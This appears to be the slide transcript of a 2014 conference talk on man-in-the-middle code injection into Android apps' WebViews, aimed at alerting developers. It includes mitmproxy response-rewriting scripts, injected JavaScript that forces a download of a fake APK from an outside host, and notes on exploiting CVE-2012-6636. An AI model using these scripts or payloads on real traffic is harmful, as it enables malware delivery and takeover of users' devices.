mitm attacks in android apps - tdc 2014
TRANSCRIPT
The Developer's Conference 2014
Ataques MITM a Aplicativos Android
Abusando da confiana dos desenvolvedores
Ivan Joker Jeukens
Motivation
Many apps have built in web browser capabilitiesWebView, ChromeWebView, etc, classes
HTML, Javascript
Can we inject executable code in an app ?
AdvantagesWe have the client code !
Ofuscation is not really known/used by most developers
Messing with the server app communication, not about grabbing cookies etc
UsefulnessDirected attacks
The Developer's Conference 2014
Lab setup & tools
Android SDK AVD Android 4.0.3 CPU/ABI Intel Atom
mitmproxy.orgPython scripts for manipulating requests and responses
code.google.com/p/android-apktool/Decompile into smali code
github.com/egirault/googleplay-api.gitapi for interacting with google store (download apps from scripts)
The Developer's Conference 2014
MITM Script
def response(ctx, flow): if flow.response.content != None and isXml(flow.response.headers['Content-Type']): etype = flow.response.headers['Content-Encoding']; flow.response.decode()
parser = etree.XMLParser(strip_cdata=False) root = etree.XML(flow.response.content, parser)
...
flow.response.content = etree.tostring(root, encoding='UTF-8') flow.response.headers['Content-Encoding'] = etype; if 'gzip' in etype: flow.response.encode('gzip')
The Developer's Conference 2014
MITM Script cont
if flow.response.content != None and (isJson(flow.response.headers['Content-Type']) or isJavascript(flow.response.headers['Content-Type']) ):
etype = flow.response.headers['Content-Encoding']; flow.response.decode() jsondata = json.JSONDecoder(strict=False).decode(flow.response.content) ... flow.response.content = json.JSONEncoder().encode(jsondata) flow.response.headers['Content-Encoding'] = etype; if 'gzip' in etype: flow.response.encode('gzip')
elif flow.response.content != None and isHtmlText( flow.response.headers['Content-Type'] ): etype = flow.response.headers['Content-Encoding']; flow.response.decode() htmldata = BeautifulSoup(flow.response.content) body = htmldata.body ... r = htmldata.prettify(formatter=None) flow.response.content = r.encode('ascii','ignore')
flow.response.headers['Content-Encoding'] = etype; if 'gzip' in etype: flow.response.encode('gzip')
The Developer's Conference 2014
Payload 1
Simple Social Engineering for malware distribution
Veja magazine news reader
The Developer's Conference 2014
Payload 1
The Developer's Conference 2014
Payload1
.class public Lcom/matera/veja/ui/StoryDetail; .
.method private createWebView()V .
The Developer's Conference 2014
The Developer's Conference 2014
The Developer's Conference 2014
Payload 1
Some lame javascript
payloadveja = ' function fase2() { var img = document.getElementById("chupacabra"); img.src = "http://joker.com/vejadown.jpg"; }
function goDown() { var link = document.createElement("a"); link.href = "http://joker.com/com.matera.veja.apk"; if(document.createEvent) { var e = document.createEvent("MouseEvents"); e.initEvent("click" ,true ,true); link.dispatchEvent(e); } setTimeout( fase2, 3000 ); } '
The Developer's Conference 2014
Payload 2
CVE-2012-6636 03/02/2014The Android API before 17 does not properly restrict the WebView.addJavascriptInterface() method
In theory , affects android < 4.2Versions 2.3.X doesn't work
Some 3.X also difficult
Adobe Reader /data/data/br.com.gabba.Caixa/pwnd.txt']);
WebSettings webSettings = browser.getSettings();webSettings.setJavaScriptEnabled(true);browser.addJavascriptInterface(new JsInvokeClass(), "Android");
The Developer's Conference 2014
Payload 2
Android > 4.2annotation @JavascriptInterface method wise
My statistics on this vuln (googleplay-api for downloading the apps)Googleplay-api script downloads the 100 most popular free apps for all categories.
2379 Apps downloaded apps 922 have addJavascript Interface 339 (14%) don't use @JavascriptInterface
The Developer's Conference 2014
Payload 2
.class public Lbr/com/gabba/Caixa/CaixaWebViewActivity;.super Landroid/app/Activity;.const-string v7, "Android"
invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V.const-string v7, "HTMLOUT"
invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
The Developer's Conference 2014
The Developer's Conference 2014
Payload 3
SimplerInstead of injecting code, just mess with the html links
The Developer's Conference 2014
The Developer's Conference 2014
Payload 3
The Developer's Conference 2014
The Developer's Conference 2014
Feasibility
These attacks require:Setup mitmwifi range
Either a rogue ap, public probe attack
vuln soho router
Some recon of your target apps
Catch the requests
The Developer's Conference 2014
Conclusions
Apps normally don't validate their data
Https is the only solution used to prevent these attacks
The Developer's Conference 2014
Thanks for watching
ivanjokerbr.github.io
github.com/ivanjokerbr/
www.slideshare.net/ivanjokerbr